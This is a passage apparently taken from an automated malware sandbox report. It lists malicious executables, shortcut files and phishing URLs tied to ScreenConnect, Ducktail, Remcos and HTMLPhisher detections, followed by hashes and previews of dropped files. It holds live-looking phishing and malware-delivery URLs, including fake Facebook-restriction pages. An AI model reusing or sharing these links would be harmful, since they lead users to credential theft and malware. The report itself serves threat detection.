                                                                                                                                                                                                                              y4FSQMICGJ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              y4FSQMICGJ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              75kTq6Y4Ck.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              bg.microsoft.map.fastly.nethttps://assets-fra.mkt.dynamics.com/899008e9-019b-ef11-8a66-6045bd6cbcf8/digitalassets/standaloneforms/eef8cd2b-b69d-ef11-a72c-000d3ae7186cGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                              https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                              http://iw.lrvm8.sa.com/teed/ettd/sf_rand_string_mixed(24)/khalid@startissueuk.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                              http://bilfinger.sam2.us/user/select_client.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                              http://bilfinger.sam2.us/user/select_client.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                              H71PKTiNjk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                              nR3nVVTX3s.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                              https://www.google.com.ng/url?q=37h0p8pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/safrareal.%E2%80%8Bco%C2%ADm.%E2%80%8Bb%C2%ADr/yaya/Bo3tFjkVxTKtc5gZKuo6OSiq/am9lcmcucnVja3N0dWhsQHBpbGF0dXMtYWlyY3JhZnQuY29t$?Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                              Csc-File-260593301.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                              fp2e7a.wpc.phicdn.nethttps://assets-fra.mkt.dynamics.com/899008e9-019b-ef11-8a66-6045bd6cbcf8/digitalassets/standaloneforms/eef8cd2b-b69d-ef11-a72c-000d3ae7186cGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.229.221.95
                                                                                                                                                                                                                              https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 192.229.221.95
                                                                                                                                                                                                                              http://iw.lrvm8.sa.com/teed/ettd/sf_rand_string_mixed(24)/khalid@startissueuk.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.229.221.95
                                                                                                                                                                                                                              https://www.google.co.za/url?q=sf_rand(2000)pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/i%C2%ADw%C2%AD.lr%C2%ADv%C2%ADm8%C2%AD.sa.%E2%80%8Bco%C2%ADm%2Fteed%2Fettd%2Fsf_rand_string_mixed(24)/khalid@startissueuk.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.229.221.95
                                                                                                                                                                                                                              http://bilfinger.sam2.us/user/select_client.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.229.221.95
                                                                                                                                                                                                                              http://bilfinger.sam2.us/user/select_client.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.229.221.95
                                                                                                                                                                                                                              https://krtra.com/t/vOPRDbTNH5dTGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 192.229.221.95
                                                                                                                                                                                                                              https://u47729088.ct.sendgrid.net/wf/unsubscribe?upn=3Du001.qfZdNR0QStX7hi2499Z9bKHIlfJoRWg-2BGlWGdDVuEI-2FobzG9qjz4-2F04dob5Dd6GOUOU3Pe4GE6PYrXt2oKkILSW7N9FfZQ2N4Gl35KnpMSqBEWT2CbT9LCLJC-2BeMxZALeTpvN5SBe08WeI-2FhTtsgBJev9lV3YkMDIwR7EBz-2B7F8EJjQkPD0IOqhhIuRXe5-2B9OHyqfzRQ4ayUfJbAlcMDgakc8ysnB1wtz8dbYmRDwX8EKBCtLze2k3Tx2M2PnN-2FNhetjpCvMkKln1DLnT31q4j4LArUZd8zg83JOgRfGySUlDH1wNyjD-2FIFG3u702Eii1BdlMzEZ2n2J16PuZDhT-2BkYm-2Fje2zPp-2FMTq%20buOWolcgW0VkVdtN40bscK9DZxTJlq9NLJlRJ9FR3ceLaN36YPjnjkNwWqJ8u5j-2BVu08f8QPTZu2tDZIQhFb0kTHTGWEpyjMLS0ioEEFdZNkfbvR-2FagqvmkoMLXQsCf-2FRkOYjuYSsLpqjfmYpGDfnDvIgqhdAttFl1CW01gIG2o86bl45nvABGkxr5-2FdDtzSidtQf3BUumtadsueMbHwj9Cxu3xjQ-2BFZagQl0SqdqzSQY-2B-2F1SMCnOqcNzH-2FyXdbmfTPhtwqoQ-2BwUCzVnfeYurWiDmX497ZHT7yRqrIkrN8-2Fh723KQBdV125gyQNDPPI5Ge5igGUb6e1YEy2gW-2Fa97Hp3tilScSTQnTPjSuKSOiV-2Fbd-2FJP9TE-2B6TW8lIqV3Ywwt8nTI2fD8kLxAz3NUAmW6wENPDzvNEdw2aknDKd-2FE3KNWiKxOLksVVE-2FoZ93M1xv22t0FVhGyXpVry8voPOWs0NGJo5CvW0gR4NxDh9QiKB77vYgo8CU9-2FTMXvo2u-2BDqbKmIJlgZH8vD2ixsxHAiZYoPhwOfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.229.221.95
                                                                                                                                                                                                                              https://www.google.com.ng/url?q=37h0p8pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/safrareal.%E2%80%8Bco%C2%ADm.%E2%80%8Bb%C2%ADr/yaya/Bo3tFjkVxTKtc5gZKuo6OSiq/am9lcmcucnVja3N0dWhsQHBpbGF0dXMtYWlyY3JhZnQuY29t$?Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 192.229.221.95
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              COMBAHTONcombahtonGmbHDE0jg24sHn9q.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 194.59.31.120
                                                                                                                                                                                                                              VDsZYqbfHI.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.31.9
                                                                                                                                                                                                                              2siOtP5z21.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.31.9
                                                                                                                                                                                                                              7uihPKvK0C.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.31.9
                                                                                                                                                                                                                              VDsZYqbfHI.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.31.9
                                                                                                                                                                                                                              1bNQ03YM1i.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.31.9
                                                                                                                                                                                                                              Z1e8koEK3U.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.31.9
                                                                                                                                                                                                                              A6Rywp6HpH.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.31.9
                                                                                                                                                                                                                              RncEYKvQGh.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              • 194.59.31.9
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eO5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                                                              • 194.59.30.201
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exepzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  statments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                      Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                          extukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                            Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                              support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exepzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                  pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                    statments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                      Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                        Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                          sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                            extukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                              Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                  Entropy (8bit):0.35901589905449205
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:6xboaaD0JOCEfMuaaD0JOCEfMKQmDkxboaaD0JOCEfMuaaD0JOCEfMKQmD:ZaaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                                                                                                                                                                                                                                                                  MD5:7D48941DB05D2D1C9A0C52739933543F
                                                                                                                                                                                                                                                                  SHA1:4FF1446A7D5DA6BBEA145000B00A9F4FFED90930
                                                                                                                                                                                                                                                                  SHA-256:C436AB7F36E238365FDDF5BDFEB9EBFEFACE94AD0FEB79C571182DA968815D87
                                                                                                                                                                                                                                                                  SHA-512:41C7DA95797437840014733F7021883E034503A9D8F07F7C9A0B1131A869A29A6E00D4E9FA99EEDAFBDD2F0DFDAFFB0A7671D8F666DA0E2023CA887E4BA0FB62
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:*.>...........f.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................f.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                  Entropy (8bit):0.7107433309639619
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqH:2JIB/wUKUKQncEmYRTwh0r
                                                                                                                                                                                                                                                                  MD5:4339AF983BCC8769F09CE9079CF0866D
                                                                                                                                                                                                                                                                  SHA1:822327E8F060126392F9DDFF4DDBC9B0981CF857
                                                                                                                                                                                                                                                                  SHA-256:F803DD3122A1580AED070952F6ACE8912DF221937446E2E41E0D93644A8290D8
                                                                                                                                                                                                                                                                  SHA-512:72784FE62242ECDDDE13BA8EB76CF612149F4C8B39F362CB200D302A0B07C42EF37DD88094D212C76166145C1931E9456139E881089A1E432AF09747659507A7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcf23b792, page size 16384, Windows version 10.0
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                  Entropy (8bit):0.6651686075640577
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:FSB2ESB2SSjlK/2502y0IEWBqbMo5g5+Ykr3g16z2UPkLk+kK+UJ8xUJSSiWjFjF:FazaU+uroc2U5Si6
                                                                                                                                                                                                                                                                  MD5:6CCC89EB1ED952D1AB4528289050ABBD
                                                                                                                                                                                                                                                                  SHA1:5F55EB5E6684A9C39541DD2825884AD0F2B1B20B
                                                                                                                                                                                                                                                                  SHA-256:750E40402B4AAD160D85B780FF422C35B876DD71EEC3ED5E0CFC5E361418A029
                                                                                                                                                                                                                                                                  SHA-512:1BA70ECDB373A3D2B2290F80712F8FC5D393915CB88F33F85C2F7D075FDBA823F128829F9B20F6A0F8956A4CD9AAC02D12A5CADA37A2FF8C8A01303A23B5D003
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.#..... .......#.......X\...;...{......................0.e..........|.......|..h.b..........|..0.e.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................l%.......|....................,|.....|...........................#......0.e.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                  Entropy (8bit):0.07900895785553667
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:4RWsetYeDqU6j/ltLocjmgj/ltNDnj/ltollkqqG9lXlZOS:4RUzDk0KcVr
                                                                                                                                                                                                                                                                  MD5:6D75FC844B4F07C488CC62848F22C2E5
                                                                                                                                                                                                                                                                  SHA1:5A0384CBEE81DF7E4E14D18D09730D7B2A98A215
                                                                                                                                                                                                                                                                  SHA-256:E518D31131BE83719F00361B28510788782B88CB9F9744CE5F82A60A5760A122
                                                                                                                                                                                                                                                                  SHA-512:D3CAB8F1D197CFCF37E153752EF9E22C90B7A2E298A7E60BFB95B5394595C06DE46387B56B3FA253BE6D9459158702FCE1CFFF8DF410F4594F515ED9BB576E1F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:9........................................;...{.......|.......|...............|A......|..<..k.....|....................,|.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                                  Entropy (8bit):0.9296103286411475
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:HOF7Z9c+MQds6fhqvGXyf8QXIDcQvc6QcEVcw3cE/9CbCB+HbHg/JgnQoFyOuawI:uf9dIP0BU/QjMxlzuiFUZ24IO8K
                                                                                                                                                                                                                                                                  MD5:1512BC10C775A462AD64031BF583E8FA
                                                                                                                                                                                                                                                                  SHA1:A26CC19A76A8172EE111C4BE6942048B085041B7
                                                                                                                                                                                                                                                                  SHA-256:2AF4385903E616C0B8D516D23D4CCC4AED1217EDC44FFA33AFCEAF8435D1D40C
                                                                                                                                                                                                                                                                  SHA-512:E9BFBFA0E4AA1DBDD642AE7FDC7242D38D7B0F4F1B6047BA77E06EDE0E0638253D98C77FA9F697B99B1E7E19006EAC678FB2C25DB91C2F7F9F8BB4B7CD4C3D59
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.5.3.9.8.9.1.7.8.8.8.4.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.5.3.9.8.9.2.3.8.2.5.7.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.4.5.b.0.8.d.-.8.6.3.c.-.4.b.0.d.-.9.d.1.d.-.0.7.a.c.8.0.a.9.6.b.5.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.3.7.f.3.b.e.-.a.d.9.f.-.4.7.8.2.-.a.7.2.5.-.b.d.d.f.f.f.a.c.8.0.0.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.o.n.t.h.l.y.-.e.S.t.a.t.e.m.e.n.t.F.o.r.u.m.1.2.0.4.7.8.9.6.2...C.l.i.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.f.8.-.0.0.0.1.-.0.0.1.4.-.d.c.2.1.-.7.2.4.4.c.6.3.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.5.3.e.d.2.8.1.b.3.2.6.b.1.a.6.8.6.a.4.9.5.f.e.9.6.d.0.a.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.e.b.9.6.5.6.e.d.e.1.f.e.d.2.3.f.d.a.e.b.6.7.8.1.5.a.f.c.d.4.8.9.d.e.d.0.
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Nov 8 11:44:51 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):73960
                                                                                                                                                                                                                                                                  Entropy (8bit):1.7405802348839046
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:P/6Eb79yXqcXdaRMOEI/DfCSu4U8N/HDKD7iZrudxryevQqbgL38:59uXdaRDEI/7bEsjqiZruxryeOb
                                                                                                                                                                                                                                                                  MD5:562DB78A2831C7EFB896149C6639A02E
                                                                                                                                                                                                                                                                  SHA1:693E0A912542C160F37A91F0893AB1128BDBC3DB
                                                                                                                                                                                                                                                                  SHA-256:FCA016F2575BD283BB3BAD23B080722B764BE77B54A4BFE36D42C40ED462CBD2
                                                                                                                                                                                                                                                                  SHA-512:143BE2BC22BF68ECAE512B238FF8934A34CD28B744E30A5C6298551ABE15AAE762EDAE695923CAC217D2C6443ED568E13522B85EBDFC996A6326E1017909E167
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MDMP..a..... .........-g............T...............h.......<...$.......$...v8..........`.......8...........T...........@ ..............`...........L...............................................................................eJ..............GenuineIntel............T...........K.-g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8444
                                                                                                                                                                                                                                                                  Entropy (8bit):3.700718243030106
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJQF6l6YNoSUVgmfwtBprO89b5Xsf25Tm:R6lXJq6l6YSSUVgmfwtL5cf2Q
                                                                                                                                                                                                                                                                  MD5:CF2BD82EF0F346256D6041478E842761
                                                                                                                                                                                                                                                                  SHA1:3E9EBB4DB3BEBA2B800C99F695B87A0C6068A7B6
                                                                                                                                                                                                                                                                  SHA-256:0FCBAFEF3AB35857FB90CBDDC57A57E3077B031BC0E85D60BB8008F9DEBD6D19
                                                                                                                                                                                                                                                                  SHA-512:6CAAFF677ECF339F1D8E390F5EECD9E645CD96FC93A2873BFE7343F86D5145602598A54D0AB4AD450BAD3E909BB1A6A02FED4895A6C6669631CB4092FBE96FEB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.6.0.<./.P.i.
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4738
                                                                                                                                                                                                                                                                  Entropy (8bit):4.52428181766699
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsaJg77aI9fdSWpW8VYRWYm8M4JHAxArLFI+q80AXgvQpqwzAFXAFJd:uIjfoI7Jdz7V+fJSLYp1qOJd
                                                                                                                                                                                                                                                                  MD5:42D33397EBDEE862242FE08CF3491D1F
                                                                                                                                                                                                                                                                  SHA1:E02680D1FF5DFB866C60DAE633670BED1FC60B66
                                                                                                                                                                                                                                                                  SHA-256:03AA1BD2876314F85FD6210A8A3534C178A7290E17E78173F2C2D584062A9EAC
                                                                                                                                                                                                                                                                  SHA-512:F3F8E6F2ECE576E5B3AD1F5B969A9242CC8846925DC8D094A49CF5DBED3FAEE43DA420F272008EA78B415DB4EB3734716B9A791D3C3B8AEFFE2803B4C4853544
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="579047" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):76766
                                                                                                                                                                                                                                                                  Entropy (8bit):3.053683822707892
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:NT5A2V5WoQ89zEv57pK8zgE1c3wnwOCjuHxq3xv:NT5A2V5WoQ89zEv57pK8zgE1c36wOCjr
                                                                                                                                                                                                                                                                  MD5:B4C6F3566629D6CE9170F2B7D62C21FA
                                                                                                                                                                                                                                                                  SHA1:2003665BDC2F432A44C941F9B8D5A9ED0673AABB
                                                                                                                                                                                                                                                                  SHA-256:36FC9CD30E72F4A5642C8DC55E6D932884831DA59FB333D653CAE32A607C2EE8
                                                                                                                                                                                                                                                                  SHA-512:25FD97FD6D199DF36A1DD7A48406A411D990382003CBEF193D65243CF95AD1ED4E8818B628C346E0BAE61B0BDBE6942AC0307606AF79173216429F4386B6F4B4
